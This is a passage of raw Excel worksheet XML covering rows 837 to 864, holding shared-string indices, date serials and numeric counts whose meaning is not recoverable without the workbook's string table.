      <c r="G837" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H837" t="s">
        <v>2633</v>
      </c>
      <c r="I837" t="s">
        <v>103</v>
      </c>
      <c r="J837" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K837" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L837" t="s">
        <v>77</v>
      </c>
      <c r="M837" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P837" t="s">
        <v>772</v>
      </c>
      <c r="Q837" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W837" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="838" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A838" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B838" s="52"/>
      <c r="C838" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D838" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E838" s="95" t="s">
        <v>2634</v>
      </c>
      <c r="F838" s="42">
        <v>100</v>
      </c>
      <c r="G838" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H838" t="s">
        <v>2635</v>
      </c>
      <c r="I838" t="s">
        <v>82</v>
      </c>
      <c r="J838" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K838" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L838" t="s">
        <v>83</v>
      </c>
      <c r="M838" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P838" t="s">
        <v>745</v>
      </c>
      <c r="Q838" s="95" t="s">
        <v>787</v>
      </c>
      <c r="W838" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="839" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A839" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B839" s="52"/>
      <c r="C839" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D839" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E839" s="95" t="s">
        <v>2636</v>
      </c>
      <c r="F839" s="42">
        <v>100</v>
      </c>
      <c r="G839" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H839" t="s">
        <v>2637</v>
      </c>
      <c r="I839" t="s">
        <v>156</v>
      </c>
      <c r="J839" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K839" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L839" t="s">
        <v>38</v>
      </c>
      <c r="M839" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N839" t="s">
        <v>38</v>
      </c>
      <c r="P839" t="s">
        <v>512</v>
      </c>
      <c r="Q839" s="95" t="s">
        <v>2638</v>
      </c>
      <c r="W839" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="840" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A840" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B840" s="52"/>
      <c r="C840" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D840" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E840" s="95" t="s">
        <v>2639</v>
      </c>
      <c r="F840" s="42">
        <v>200</v>
      </c>
      <c r="G840" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H840" t="s">
        <v>2640</v>
      </c>
      <c r="I840" t="s">
        <v>179</v>
      </c>
      <c r="J840" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="K840" s="95" t="s">
        <v>23</v>
      </c>
      <c r="L840" t="s">
        <v>77</v>
      </c>
      <c r="M840" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="N840" t="s">
        <v>1007</v>
      </c>
      <c r="Q840" s="95" t="s">
        <v>2641</v>
      </c>
      <c r="W840" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="841" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A841" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B841" s="52"/>
      <c r="C841" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D841" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E841" s="95" t="s">
        <v>2642</v>
      </c>
      <c r="F841" s="42">
        <v>100</v>
      </c>
      <c r="G841" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H841" t="s">
        <v>2643</v>
      </c>
      <c r="I841" t="s">
        <v>75</v>
      </c>
      <c r="J841" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K841" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L841" t="s">
        <v>77</v>
      </c>
      <c r="M841" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N841" t="s">
        <v>238</v>
      </c>
      <c r="P841" t="s">
        <v>516</v>
      </c>
      <c r="Q841" s="95" t="s">
        <v>2644</v>
      </c>
      <c r="W841" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="842" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A842" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B842" s="52"/>
      <c r="C842" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D842" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E842" s="95" t="s">
        <v>2645</v>
      </c>
      <c r="F842" s="42">
        <v>100</v>
      </c>
      <c r="G842" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H842" t="s">
        <v>2646</v>
      </c>
      <c r="I842" t="s">
        <v>75</v>
      </c>
      <c r="J842" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K842" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L842" t="s">
        <v>77</v>
      </c>
      <c r="M842" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N842" t="s">
        <v>238</v>
      </c>
      <c r="Q842" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W842" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="843" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A843" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B843" s="52"/>
      <c r="C843" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D843" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E843" s="95" t="s">
        <v>2647</v>
      </c>
      <c r="F843" s="42">
        <v>200</v>
      </c>
      <c r="G843" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H843" t="s">
        <v>2648</v>
      </c>
      <c r="I843" t="s">
        <v>179</v>
      </c>
      <c r="J843" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K843" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L843" t="s">
        <v>77</v>
      </c>
      <c r="P843" t="s">
        <v>920</v>
      </c>
      <c r="Q843" s="95" t="s">
        <v>2649</v>
      </c>
      <c r="W843" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="844" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A844" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B844" s="52"/>
      <c r="C844" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D844" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E844" s="95" t="s">
        <v>2647</v>
      </c>
      <c r="F844" s="42">
        <v>100</v>
      </c>
      <c r="G844" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H844" t="s">
        <v>2650</v>
      </c>
      <c r="I844" t="s">
        <v>179</v>
      </c>
      <c r="J844" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K844" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L844" t="s">
        <v>77</v>
      </c>
      <c r="Q844" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W844" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="845" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A845" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B845" s="52"/>
      <c r="C845" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D845" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E845" s="95" t="s">
        <v>2651</v>
      </c>
      <c r="F845" s="42">
        <v>100</v>
      </c>
      <c r="G845" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H845" t="s">
        <v>2652</v>
      </c>
      <c r="I845" t="s">
        <v>156</v>
      </c>
      <c r="J845" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K845" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L845" t="s">
        <v>77</v>
      </c>
      <c r="M845" s="95" t="s">
        <v>301</v>
      </c>
      <c r="N845" t="s">
        <v>476</v>
      </c>
      <c r="Q845" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W845" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="846" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A846" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B846" s="52">
        <v>44145.686774780093</v>
      </c>
      <c r="C846" s="95" t="s">
        <v>2653</v>
      </c>
      <c r="D846" s="96">
        <v>100</v>
      </c>
      <c r="E846" s="95" t="s">
        <v>2654</v>
      </c>
      <c r="F846" s="42">
        <v>100</v>
      </c>
      <c r="G846" s="95" t="s">
        <v>2655</v>
      </c>
      <c r="H846" t="s">
        <v>2656</v>
      </c>
      <c r="I846" t="s">
        <v>185</v>
      </c>
      <c r="J846" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K846" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L846" t="s">
        <v>83</v>
      </c>
      <c r="M846" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O846" s="95" t="s">
        <v>2657</v>
      </c>
      <c r="Q846" s="95" t="s">
        <v>2658</v>
      </c>
      <c r="R846">
        <v>10360</v>
      </c>
      <c r="S846">
        <v>19388</v>
      </c>
      <c r="T846">
        <v>35277</v>
      </c>
      <c r="U846">
        <v>27024</v>
      </c>
      <c r="V846">
        <v>25480</v>
      </c>
      <c r="W846" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="847" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A847" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B847" s="52">
        <v>44344.76032202546</v>
      </c>
      <c r="C847" s="95" t="s">
        <v>2659</v>
      </c>
      <c r="D847" s="96">
        <v>101</v>
      </c>
      <c r="E847" s="95" t="s">
        <v>2660</v>
      </c>
      <c r="F847" s="42">
        <v>101</v>
      </c>
      <c r="G847" s="95" t="s">
        <v>2661</v>
      </c>
      <c r="H847" t="s">
        <v>2662</v>
      </c>
      <c r="I847" t="s">
        <v>75</v>
      </c>
      <c r="J847" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K847" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L847" t="s">
        <v>77</v>
      </c>
      <c r="M847" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N847" t="s">
        <v>159</v>
      </c>
      <c r="Q847" s="95" t="s">
        <v>2663</v>
      </c>
      <c r="R847">
        <v>32658</v>
      </c>
      <c r="S847">
        <v>31144</v>
      </c>
      <c r="T847">
        <v>28657</v>
      </c>
      <c r="U847">
        <v>30336</v>
      </c>
      <c r="V847">
        <v>32350</v>
      </c>
      <c r="W847" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="848" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A848" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B848" s="52">
        <v>44312.758632731478</v>
      </c>
      <c r="C848" s="95" t="s">
        <v>1599</v>
      </c>
      <c r="D848" s="96">
        <v>100</v>
      </c>
      <c r="E848" s="95" t="s">
        <v>2664</v>
      </c>
      <c r="F848" s="42">
        <v>100</v>
      </c>
      <c r="G848" s="95" t="s">
        <v>2665</v>
      </c>
      <c r="H848" t="s">
        <v>2666</v>
      </c>
      <c r="I848" t="s">
        <v>31</v>
      </c>
      <c r="J848" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K848" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L848" t="s">
        <v>77</v>
      </c>
      <c r="M848" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N848" t="s">
        <v>263</v>
      </c>
      <c r="Q848" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R848">
        <v>11447</v>
      </c>
      <c r="S848">
        <v>9866</v>
      </c>
      <c r="T848">
        <v>7230</v>
      </c>
      <c r="U848">
        <v>13518</v>
      </c>
      <c r="V848">
        <v>13750</v>
      </c>
      <c r="W848" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="849" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A849" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B849" s="52">
        <v>44425.807912835648</v>
      </c>
      <c r="C849" s="95" t="s">
        <v>2667</v>
      </c>
      <c r="D849" s="96">
        <v>130</v>
      </c>
      <c r="E849" s="95" t="s">
        <v>2668</v>
      </c>
      <c r="F849" s="42">
        <v>130</v>
      </c>
      <c r="G849" s="95" t="s">
        <v>2669</v>
      </c>
      <c r="H849" t="s">
        <v>2670</v>
      </c>
      <c r="I849" t="s">
        <v>833</v>
      </c>
      <c r="J849" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K849" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L849" t="s">
        <v>83</v>
      </c>
      <c r="M849" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O849" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q849" s="95" t="s">
        <v>2671</v>
      </c>
      <c r="R849">
        <v>14994</v>
      </c>
      <c r="S849">
        <v>12006</v>
      </c>
      <c r="T849">
        <v>10892</v>
      </c>
      <c r="U849">
        <v>12934</v>
      </c>
      <c r="V849">
        <v>14285</v>
      </c>
      <c r="W849" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="850" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A850" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B850" s="52">
        <v>44705.760514351852</v>
      </c>
      <c r="C850" s="95" t="s">
        <v>2667</v>
      </c>
      <c r="D850" s="96">
        <v>130</v>
      </c>
      <c r="E850" s="95" t="s">
        <v>2672</v>
      </c>
      <c r="F850" s="42">
        <v>100</v>
      </c>
      <c r="G850" s="95" t="s">
        <v>2673</v>
      </c>
      <c r="H850" t="s">
        <v>2674</v>
      </c>
      <c r="I850" t="s">
        <v>833</v>
      </c>
      <c r="J850" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K850" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L850" t="s">
        <v>83</v>
      </c>
      <c r="M850" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q850" s="95" t="s">
        <v>2671</v>
      </c>
      <c r="U850">
        <v>16</v>
      </c>
      <c r="W850" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="851" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A851" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B851" s="52">
        <v>44705.760514363428</v>
      </c>
      <c r="C851" s="95" t="s">
        <v>2667</v>
      </c>
      <c r="D851" s="96">
        <v>130</v>
      </c>
      <c r="E851" s="95" t="s">
        <v>2675</v>
      </c>
      <c r="F851" s="42">
        <v>100</v>
      </c>
      <c r="G851" s="95" t="s">
        <v>2676</v>
      </c>
      <c r="H851" t="s">
        <v>2677</v>
      </c>
      <c r="I851" t="s">
        <v>833</v>
      </c>
      <c r="J851" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K851" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L851" t="s">
        <v>83</v>
      </c>
      <c r="M851" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q851" s="95" t="s">
        <v>2671</v>
      </c>
      <c r="W851" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="852" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A852" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B852" s="52">
        <v>44705.760514374997</v>
      </c>
      <c r="C852" s="95" t="s">
        <v>2667</v>
      </c>
      <c r="D852" s="96">
        <v>130</v>
      </c>
      <c r="E852" s="95" t="s">
        <v>2678</v>
      </c>
      <c r="F852" s="42">
        <v>100</v>
      </c>
      <c r="G852" s="95" t="s">
        <v>2679</v>
      </c>
      <c r="H852" t="s">
        <v>2680</v>
      </c>
      <c r="I852" t="s">
        <v>833</v>
      </c>
      <c r="J852" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K852" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L852" t="s">
        <v>83</v>
      </c>
      <c r="M852" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q852" s="95" t="s">
        <v>2671</v>
      </c>
      <c r="U852">
        <v>22</v>
      </c>
      <c r="W852" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="853" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A853" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B853" s="52">
        <v>44244.45290877315</v>
      </c>
      <c r="C853" s="95" t="s">
        <v>2681</v>
      </c>
      <c r="D853" s="96">
        <v>100</v>
      </c>
      <c r="E853" s="95" t="s">
        <v>2682</v>
      </c>
      <c r="F853" s="42">
        <v>100</v>
      </c>
      <c r="G853" s="95" t="s">
        <v>2683</v>
      </c>
      <c r="H853" t="s">
        <v>2684</v>
      </c>
      <c r="I853" t="s">
        <v>75</v>
      </c>
      <c r="J853" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K853" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L853" t="s">
        <v>77</v>
      </c>
      <c r="M853" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N853" t="s">
        <v>159</v>
      </c>
      <c r="Q853" s="95" t="s">
        <v>2663</v>
      </c>
      <c r="R853">
        <v>828</v>
      </c>
      <c r="S853">
        <v>965</v>
      </c>
      <c r="T853">
        <v>956</v>
      </c>
      <c r="U853">
        <v>994</v>
      </c>
      <c r="V853">
        <v>1178</v>
      </c>
      <c r="W853" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="854" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A854" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B854" s="52">
        <v>44425.867255358797</v>
      </c>
      <c r="C854" s="95" t="s">
        <v>2685</v>
      </c>
      <c r="D854" s="96">
        <v>120</v>
      </c>
      <c r="E854" s="95" t="s">
        <v>2686</v>
      </c>
      <c r="F854" s="42">
        <v>101</v>
      </c>
      <c r="G854" s="95" t="s">
        <v>2687</v>
      </c>
      <c r="H854" t="s">
        <v>2688</v>
      </c>
      <c r="I854" t="s">
        <v>75</v>
      </c>
      <c r="J854" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K854" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L854" t="s">
        <v>77</v>
      </c>
      <c r="M854" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N854" t="s">
        <v>159</v>
      </c>
      <c r="O854" s="95" t="s">
        <v>2689</v>
      </c>
      <c r="Q854" s="95" t="s">
        <v>2690</v>
      </c>
      <c r="S854">
        <v>6</v>
      </c>
      <c r="U854">
        <v>11</v>
      </c>
      <c r="V854">
        <v>7</v>
      </c>
      <c r="W854" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="855" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A855" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B855" s="52">
        <v>44522.770695590276</v>
      </c>
      <c r="C855" s="95" t="s">
        <v>2685</v>
      </c>
      <c r="D855" s="96">
        <v>120</v>
      </c>
      <c r="E855" s="95" t="s">
        <v>2691</v>
      </c>
      <c r="F855" s="42">
        <v>101</v>
      </c>
      <c r="G855" s="95" t="s">
        <v>2692</v>
      </c>
      <c r="H855" t="s">
        <v>2693</v>
      </c>
      <c r="I855" t="s">
        <v>75</v>
      </c>
      <c r="J855" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K855" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L855" t="s">
        <v>77</v>
      </c>
      <c r="M855" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N855" t="s">
        <v>159</v>
      </c>
      <c r="O855" s="95" t="s">
        <v>2694</v>
      </c>
      <c r="Q855" s="95" t="s">
        <v>2690</v>
      </c>
      <c r="R855">
        <v>14</v>
      </c>
      <c r="W855" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="856" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A856" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B856" s="52">
        <v>44749.768248969907</v>
      </c>
      <c r="C856" s="95" t="s">
        <v>2685</v>
      </c>
      <c r="D856" s="96">
        <v>120</v>
      </c>
      <c r="E856" s="95" t="s">
        <v>2695</v>
      </c>
      <c r="F856" s="42">
        <v>100</v>
      </c>
      <c r="G856" s="95" t="s">
        <v>2696</v>
      </c>
      <c r="H856" t="s">
        <v>2697</v>
      </c>
      <c r="I856" t="s">
        <v>75</v>
      </c>
      <c r="J856" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K856" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L856" t="s">
        <v>77</v>
      </c>
      <c r="M856" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N856" t="s">
        <v>159</v>
      </c>
      <c r="O856" s="95" t="s">
        <v>2698</v>
      </c>
      <c r="Q856" s="95" t="s">
        <v>2690</v>
      </c>
      <c r="W856" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="857" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A857" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B857" s="52">
        <v>44104.757099861112</v>
      </c>
      <c r="C857" s="95" t="s">
        <v>2699</v>
      </c>
      <c r="D857" s="96">
        <v>100</v>
      </c>
      <c r="E857" s="95" t="s">
        <v>2700</v>
      </c>
      <c r="F857" s="42">
        <v>200</v>
      </c>
      <c r="G857" s="95" t="s">
        <v>2701</v>
      </c>
      <c r="H857" t="s">
        <v>2702</v>
      </c>
      <c r="I857" t="s">
        <v>156</v>
      </c>
      <c r="J857" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K857" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L857" t="s">
        <v>77</v>
      </c>
      <c r="M857" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q857" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="W857" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="858" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A858" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B858" s="52">
        <v>44594.937432523147</v>
      </c>
      <c r="C858" s="95" t="s">
        <v>2704</v>
      </c>
      <c r="D858" s="96">
        <v>230</v>
      </c>
      <c r="E858" s="95" t="s">
        <v>2705</v>
      </c>
      <c r="F858" s="42">
        <v>211</v>
      </c>
      <c r="G858" s="95" t="s">
        <v>2706</v>
      </c>
      <c r="H858" t="s">
        <v>2707</v>
      </c>
      <c r="I858" t="s">
        <v>156</v>
      </c>
      <c r="J858" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K858" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L858" t="s">
        <v>77</v>
      </c>
      <c r="M858" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N858" t="s">
        <v>159</v>
      </c>
      <c r="O858" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q858" s="95" t="s">
        <v>2708</v>
      </c>
      <c r="R858">
        <v>2397083</v>
      </c>
      <c r="S858">
        <v>2134619</v>
      </c>
      <c r="T858">
        <v>2295891</v>
      </c>
      <c r="U858">
        <v>2492574</v>
      </c>
      <c r="V858">
        <v>3209852</v>
      </c>
      <c r="W858" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="859" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A859" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B859" s="52">
        <v>44594.9374325463</v>
      </c>
      <c r="C859" s="95" t="s">
        <v>2704</v>
      </c>
      <c r="D859" s="96">
        <v>230</v>
      </c>
      <c r="E859" s="95" t="s">
        <v>2709</v>
      </c>
      <c r="F859" s="42">
        <v>113</v>
      </c>
      <c r="G859" s="95" t="s">
        <v>2710</v>
      </c>
      <c r="H859" t="s">
        <v>1074</v>
      </c>
      <c r="I859" t="s">
        <v>156</v>
      </c>
      <c r="J859" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K859" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L859" t="s">
        <v>77</v>
      </c>
      <c r="M859" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N859" t="s">
        <v>159</v>
      </c>
      <c r="Q859" s="95" t="s">
        <v>2708</v>
      </c>
      <c r="R859">
        <v>1463983</v>
      </c>
      <c r="S859">
        <v>1734292</v>
      </c>
      <c r="T859">
        <v>1909018</v>
      </c>
      <c r="U859">
        <v>2036438</v>
      </c>
      <c r="V859">
        <v>2549187</v>
      </c>
      <c r="W859" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="860" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A860" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B860" s="52">
        <v>44594.937432476851</v>
      </c>
      <c r="C860" s="95" t="s">
        <v>2704</v>
      </c>
      <c r="D860" s="96">
        <v>230</v>
      </c>
      <c r="E860" s="95" t="s">
        <v>2711</v>
      </c>
      <c r="F860" s="42">
        <v>208</v>
      </c>
      <c r="G860" s="95" t="s">
        <v>2712</v>
      </c>
      <c r="H860" t="s">
        <v>2713</v>
      </c>
      <c r="I860" t="s">
        <v>156</v>
      </c>
      <c r="J860" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K860" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L860" t="s">
        <v>77</v>
      </c>
      <c r="M860" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N860" t="s">
        <v>159</v>
      </c>
      <c r="O860" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q860" s="95" t="s">
        <v>2708</v>
      </c>
      <c r="R860">
        <v>10150</v>
      </c>
      <c r="S860">
        <v>9127</v>
      </c>
      <c r="T860">
        <v>7619</v>
      </c>
      <c r="U860">
        <v>16554</v>
      </c>
      <c r="V860">
        <v>24847</v>
      </c>
      <c r="W860" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="861" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A861" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B861" s="52">
        <v>44594.937432569444</v>
      </c>
      <c r="C861" s="95" t="s">
        <v>2704</v>
      </c>
      <c r="D861" s="96">
        <v>230</v>
      </c>
      <c r="E861" s="95" t="s">
        <v>2714</v>
      </c>
      <c r="F861" s="42">
        <v>100</v>
      </c>
      <c r="G861" s="95" t="s">
        <v>2715</v>
      </c>
      <c r="H861" t="s">
        <v>2716</v>
      </c>
      <c r="I861" t="s">
        <v>156</v>
      </c>
      <c r="J861" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K861" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L861" t="s">
        <v>77</v>
      </c>
      <c r="M861" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N861" t="s">
        <v>159</v>
      </c>
      <c r="Q861" s="95" t="s">
        <v>2708</v>
      </c>
      <c r="U861">
        <v>167</v>
      </c>
      <c r="V861">
        <v>24904</v>
      </c>
      <c r="W861" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="862" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A862" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B862" s="52">
        <v>44603.7096833912</v>
      </c>
      <c r="C862" s="95" t="s">
        <v>2717</v>
      </c>
      <c r="D862" s="96">
        <v>201</v>
      </c>
      <c r="E862" s="95" t="s">
        <v>2718</v>
      </c>
      <c r="F862" s="42">
        <v>201</v>
      </c>
      <c r="G862" s="95" t="s">
        <v>2719</v>
      </c>
      <c r="H862" t="s">
        <v>2720</v>
      </c>
      <c r="I862" t="s">
        <v>75</v>
      </c>
      <c r="J862" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K862" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L862" t="s">
        <v>77</v>
      </c>
      <c r="M862" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q862" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="W862" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="863" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A863" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B863" s="52">
        <v>44603.709683414352</v>
      </c>
      <c r="C863" s="95" t="s">
        <v>2717</v>
      </c>
      <c r="D863" s="96">
        <v>201</v>
      </c>
      <c r="E863" s="95" t="s">
        <v>2721</v>
      </c>
      <c r="F863" s="42">
        <v>201</v>
      </c>
      <c r="G863" s="95" t="s">
        <v>2722</v>
      </c>
      <c r="H863" t="s">
        <v>2723</v>
      </c>
      <c r="I863" t="s">
        <v>75</v>
      </c>
      <c r="J863" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K863" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L863" t="s">
        <v>77</v>
      </c>
      <c r="M863" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q863" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="T863">
        <v>722</v>
      </c>
      <c r="U863">
        <v>303</v>
      </c>
      <c r="V863">
        <v>317</v>
      </c>
      <c r="W863" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="864" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A864" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B864" s="52">
        <v>44252.689908368055</v>
      </c>
      <c r="C864" s="95" t="s">
        <v>2724</v>
      </c>
      <c r="D864" s="96">
        <v>100</v>
      </c>
      <c r="E864" s="95" t="s">
        <v>2725</v>
      </c>
      <c r="F864" s="42">
        <v>100</v>
      </c>
      <c r="G864" s="95" t="s">
        <v>2726</v>
      </c>
      <c r="H864" t="s">
        <v>2727</v>
      </c>
      <c r="I864" t="s">
        <v>75</v>
      </c>
      <c r="J864" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K864" s="95" t="s">
